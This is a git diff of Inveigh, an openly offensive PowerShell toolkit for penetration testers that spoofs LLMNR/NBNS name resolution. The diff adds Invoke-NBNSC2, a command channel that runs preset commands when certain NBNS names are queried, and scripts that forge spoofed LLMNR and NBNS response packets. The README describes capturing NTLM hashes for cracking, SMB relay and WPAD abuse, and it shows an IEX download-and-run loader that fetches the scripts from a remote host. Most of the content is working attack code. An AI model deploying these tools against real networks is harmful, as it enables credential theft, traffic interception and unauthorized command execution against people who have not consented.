diff options
| -rw-r--r-- | Extras/Invoke-NBNSC2.ps1 | 151 | ||||
| -rw-r--r-- | Extras/Send-LLMNRResponse.ps1 | 87 | ||||
| -rw-r--r-- | Extras/Send-NBNSResponse.ps1 | 105 | ||||
| -rw-r--r-- | Inveigh.psm1 | 4 | ||||
| -rw-r--r-- | README.md | 293 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 1177 | ||||
| -rw-r--r-- | Scripts/Inveigh-Unprivileged.ps1 | 2364 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 1653 |
8 files changed, 4400 insertions, 1434 deletions
diff --git a/Extras/Invoke-NBNSC2.ps1 b/Extras/Invoke-NBNSC2.ps1 new file mode 100644 index 0000000..41d2e64 --- /dev/null +++ b/Extras/Invoke-NBNSC2.ps1 @@ -0,0 +1,151 @@ +function Invoke-NBNSC2 +{ +<# +.SYNOPSIS +Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are +received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be +sent from a NBNS enabled system on the same subnet using ping, etc. + +.PARAMETER Hostnames +A comma separated list of Hostnames that will trigger a corresponding command. The first hostname trigger a command +from the Commands array with a matching index (e.g. Hostnames[0] executes Commands[0]). + +.PARAMETER Commands +An array of commands stored in scriptblock format. All commands must be enclosed in {} brackets. + +.PARAMETER ExitHostname +Specify a hostname that will cause the function to exit. This hostname must not match a hostname used in Hostnames. + +.PARAMETER RunTime +(Integer) Set the run time duration. + +.PARAMETER RunTimeUnit +Default = Minutes: Set the time unit for RunTime to either Minutes, Hours, or Days. + +.EXAMPLE +Send-NBNSC2 -Hostnames test1,test2 -Command {calc},{notepad} -RunTime 1 -RunTimeUnit Days + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + +[CmdletBinding()] +param +( +[parameter(Mandatory=$true)][Array]$Hostnames = "", +[parameter(Mandatory=$true)][Array]$Commands = "", +[parameter(Mandatory=$true)][String]$ExitHostname = "", +[parameter(Mandatory=$false)][Int]$RunTime="", +[parameter(Mandatory=$false)][ValidateSet("Minutes","Hours","Days")][String]$RunTimeUnit="Minutes", +[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if($Hostnames.Count -ne $Commands.Count) +{ + throw "Must use an equal number of Hostnames and Commands." +} +elseif($Hostnames -contains $ExitHostname) +{ + throw "ExitHostname cannot be used as in Hostnames." +} + +if($RunTime) +{ + if($RunTimeUnit -like 'Minutes') + { + $runtime_timeout = new-timespan -Minutes $RunTime + } + elseif($RunTimeUnit -like 'Hours') + { + $runtime_timeout = new-timespan -Hours $RunTime + } + elseif($RunTimeUnit -like 'Days') + { + $runtime_timeout = new-timespan -Days $RunTime + } + + $runtime_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() +} + +$Hostnames = $Hostnames | % {$_.ToUpper()} +$running = $true +$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137) +$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 +$NBNS_UDP_client.Client.ReceiveTimeout = 10000 +$control_timeout = new-timespan -Seconds 1 +$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + +while($running) +{ + try + { + $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) + } + catch + { + $NBNS_request_data = $null + } + + if($NBNS_request_data) + { + $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + $NBNS_query_string_subtracted = "" + $NBNS_query_string = "" + $n = 0 + + if($NBNS_query_string_encoded.Length -gt 1) + { + do + { + $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) + $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) + $n += 1 + } + until($n -gt ($NBNS_query_string_encoded.Length - 1)) + + $n = 0 + + do + { + $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) + } + + if([Array]::IndexOf($Hostnames,$NBNS_query_string) -ge 0 -and $control_stopwatch.Elapsed -ge $control_timeout) + { + $NBNS_UDP_client.Close() + $command_index = [Array]::IndexOf($Hostnames,$NBNS_query_string) + $NBNS_query_string = '' + & $Commands[$command_index] + $control_timeout = new-timespan -Seconds 5 + $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 10000 + } + elseif($ExitHostname -like $NBNS_query_string) + { + $running = $false + } + } + + if($RunTime -and $runtime_stopwatch.Elapsed -ge $runtime_timeout) + { + $running = $false + } + +} + +$NBNS_UDP_client.Close() + +}
\ No newline at end of file diff --git a/Extras/Send-LLMNRResponse.ps1 b/Extras/Send-LLMNRResponse.ps1 new file mode 100644 index 0000000..cc22091 --- /dev/null +++ b/Extras/Send-LLMNRResponse.ps1 @@ -0,0 +1,87 @@ + +function Send-LLMNRResponse +{ +<# +.SYNOPSIS +Send-LLMNRResponse sends a crafted LLMNR response packet to a specific target. For name resolution to be successful, +the specified TargetIP, TargetPort, Hostname, and TransactionID must match a very (very very) recent LLMNR request. +You must have an external method (wireshark,etc) of viewing the required LLMNR request fields for traffic on the +target subnet. The odds of pulling this attack off manually are slim if not impossible due to the narrow response +window. Ideally, this function would be fed by another script. + +.PARAMETER Hostname +Default = WPAD: Specify a hostname for NBNS spoofing. + +.PARAMETER LLMNRTTL +Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. + +.PARAMETER SendPort +Default = Random Available: Specify a source port for the LLMNR response. Note that the standard port is 5355 +which will cause a binding conflict if LLMNR is enabled on the host system. A random port seems to work fine. + +.PARAMETER SpooferIP +Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system +other than the function host. + +.PARAMETER TargetIP +Specify an IP address to target for the LLMNR response. + +.PARAMETER TargetPort +Specify an port to target for the LLMNR response. This port must match the source port included in the request. + +.EXAMPLE +Send-LLMNRResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + + +[CmdletBinding()] +param +( +[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", +[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="", +[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="", +[parameter(Mandatory=$true)][String]$Hostname = "", +[parameter(Mandatory=$true)][Int]$TargetPort="", +[parameter(Mandatory=$false)][Int]$SendPort="0", +[parameter(Mandatory=$false)][Int]$LLMNRTTL="30", +[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if(!$SpooferIP) +{ + $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) +} + +$hostname_bytes = [System.Text.Encoding]::UTF8.GetBytes($Hostname) +$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) +[Array]::Reverse($LLMNR_TTL_bytes) +$Transaction_ID_encoded = $TransactionID.Insert(2,'-') +$Transaction_ID_bytes = $Transaction_ID_encoded.Split('-') | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + +$LLMNR_response_packet = $Transaction_ID_bytes + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $hostname_bytes.Count + + $hostname_bytes + + 0x00,0x00,0x01,0x00,0x01 + + $hostname_bytes.Count + + $hostname_bytes + + 0x00,0x00,0x01,0x00,0x01 + + $LLMNR_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + +$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort) +$destination_IP = [System.Net.IPAddress]::Parse($TargetIP) +$destination_point = New-Object Net.IPEndpoint($destination_IP,$TargetPort) +$send_socket.Connect($destination_point) +$send_socket.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) +$send_socket.Close() +}
\ No newline at end of file diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1 new file mode 100644 index 0000000..3d5ed02 --- /dev/null +++ b/Extras/Send-NBNSResponse.ps1 @@ -0,0 +1,105 @@ + +function Send-NBNSResponse +{ +<# +.SYNOPSIS +Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful, +the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must +have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target +subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been +able to get it to work manually by watching tshark with the the transaction ID being listed in the output. +Ideally, this function would be fed by another script. + +.PARAMETER Hostname +Default = WPAD: Specify a hostname for NBNS spoofing. + +.PARAMETER NBNSTTL +Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. + +.PARAMETER SendPort +Default = 137: Specify a source port for the NBNS response. + +.PARAMETER SpooferIP +IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system +other than the function host. + +.PARAMETER TargetIP +IP address to target for the NBNS response. + +.PARAMETER TransactionID +NBNS transaction ID that matches the transaction from the NBNS request. + +.EXAMPLE +Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + + +[CmdletBinding()] +param +( +[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", +[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="", +[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="", +[parameter(Mandatory=$true)][String]$Hostname = "", +[parameter(Mandatory=$false)][Int]$SendPort="137", +[parameter(Mandatory=$false)][Int]$NBNSTTL="165", +[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if(!$SpooferIP) +{ + $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) +} + +$Hostname = $Hostname.ToUpper() + +$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, + 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 + +$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname) +$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) +$hostname_encoded = $hostname_encoded.Replace("-","") +$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) +$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) +[Array]::Reverse($NBNS_TTL_bytes) +$Transaction_ID_encoded = $TransactionID.Insert(2,'-') +$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + +for($i=0; $i -lt $hostname_encoded.Count; $i++) +{ + + if($hostname_encoded[$i] -gt 64) + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 10 + } + else + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 17 + } + +} + +$NBNS_response_packet = $Transaction_ID_bytes + + 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + +$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort) +$destination_IP = [System.Net.IPAddress]::Parse($TargetIP) +$destination_point = New-Object Net.IPEndpoint($destination_IP,137) +$send_socket.Connect($destination_point) +$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length) +$send_socket.Close() +}
\ No newline at end of file diff --git a/Inveigh.psm1 b/Inveigh.psm1 index 3e0cf7e..1e76490 100644 --- a/Inveigh.psm1 +++ b/Inveigh.psm1 @@ -1,10 +1,10 @@ <# .SYNOPSIS -Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP(S)/SMB and NTLMv2 HTTP to SMB relay. +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool. .LINK https://github.com/Kevin-Robertson/Inveigh #> Import-Module $PWD\Scripts\Inveigh.ps1 -Import-Module $PWD\Scripts\Inveigh-BruteForce.ps1 +Import-Module $PWD\Scripts\Inveigh-Unprivileged.ps1 Import-Module $PWD\Scripts\Inveigh-Relay.ps1
\ No newline at end of file @@ -1,7 +1,42 @@ # Inveigh Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool designed to assist penetration testers that find themselves limited to a Windows system. -## Functions +## Included In +* PowerShell Empire - https://github.com/PowerShellEmpire/Empire +* PS>Attack - https://github.com/jaredhaight/psattack +* p0wnedShell - https://github.com/Cn33liz/p0wnedShell + +## Special Thanks +* Anyone that posted .NET packet sniffing examples. +* Responder - https://github.com/SpiderLabs/Responder +* Impacket - https://github.com/CoreSecurity/impacket + +## Import +* To import with Import-Module: + Import-Module ./Inveigh.psd1 + +* To import using the dot source method: + . ./Inveigh.ps1 + . ./Inveigh-BruteForce.ps1 + . ./Inveigh-Relay.ps1 + +* To load into memory using Invoke-Expression: + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Unprivileged.ps1") + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") + +## System Requirements +* Tested minimums are PowerShell 2.0 and .NET 3.5 + +## Functions +* Invoke-Inveigh +* Invoke-InveighUnprivileged +* Invoke-InveighRelay +* Clear-Inveigh +* Get-Inveigh +* Stop-Inveigh +* Watch-Inveigh + ### Invoke-Inveigh * The main Inveigh LLMNR/NBNS spoofer function. @@ -20,101 +55,146 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design ##### Notes: * LLMNR/NBNS spoofing is performed by packet sniffing and responding through raw sockets. * SMB challenge/response captures are performed by sniffing over the host system's SMB service. +* The local LLMNR/NBNS services do not need to be disabled on the host system. +* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. +* Ensure that any needed LMMNR, NBNS, SMB, HTTP, HTTPS ports are open within any local firewall on the host system. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. + +##### Examples: +* To execute with default settings: + Invoke-Inveigh + +* To load and execute with one line: + Import-Module ./Inveigh.ps1;Invoke-Inveigh + +* To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled. + Invoke-Inveigh -ConsoleOutpuy Y -FileOutput Y -NBNS Y + +##### Screenshot: + ##### Parameters: -* __IP__ - Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. -* __SpooferIP__ - Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. -* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. +* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. +* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. +* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning. * __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. * __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. * __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +* __SpooferLearning__ - Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist. The valid system must respond to the protocol type that matches the protocol of the original request in order to be blacklisted. +* __SpooferLearningDelay__ - (Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning. +* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled. * __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. -* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. -* __LLMNRTTL__ - Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. -* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. +* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. +* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. * __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. -* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. -* __HTTPDir__ - Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. -* __HTTPDefaultFile__ - Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. -* __HTTPDefaultEXE__ - Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. -* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. -* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. +* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. +* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. +* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. +* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. +* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. +* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. +* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. +* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. * __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. -* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. +* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. +* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. * __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. +* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. * __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. -* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __SMBRelay__ - Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory. -* __SMBRelayTarget__ - IP address of system to target for SMB relay. -* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. -* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. -* __SMBRelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. -* __SMBRelayNetworkTimeout__ - Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. +* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. * __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. -* __ConsoleStatus__ - Default = Disabled: (Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. +* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. * __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. * __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire -### Invoke-InveighBruteForce -* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell. +### Invoke-InveighUnprivileged +* Inveigh LLMNR/NBNS spoofer function that does not require local administrator access. ##### Privilege Requirements: * Regular User ##### Features: +* IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service +* IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled * Targeted IPv4 NBNS brute force spoofer with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP +* Basic auth cleartext credential capture over HTTP +* WPAD server capable of hosting a basic or custom wpad.dat file +* HTTP server capable of hosting limited content * Granular control of console and file output * Run time control -##### Notes: -* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working. +##### Notes: +* The local NBNS service does not need to be disabled on the host system. +* Ensure that any needed LMMNR, NBNS, HTTP ports are open within any local firewall on the host system. +* Migrating/injecting into a process that has already been allowed incoming/outgoing firewall access should also work. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. +* Microsoft released patches in June 2016 that will likely prevent some of this function's brute force features from working the way they did before June. + +##### Examples: +* To execute with default settings: + Invoke-InveighUnprivileged + +* To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes. + Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30 + +##### Screenshot: + ##### Parameters: -* __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host. -* __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing. -* __Hostname__ - Default = WPAD: Specify a hostname for NBNS spoofing. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. -* __NBNSPause__ Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. -* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Unprivileged host. +* __SpooferTarget__ - IP address to target for brute force NBNS spoofing. +* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. +* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. +* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. +* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. +* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. +* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. +* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. +* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name +* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. +* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer. +* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. -* __HTTPIP__ - Default = Any: Specify a TCP IP address for the HTTP listener. -* __HTTPPort__ - Default = 80: Specify a TCP port for the HTTP listener. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. -* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary. -* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type 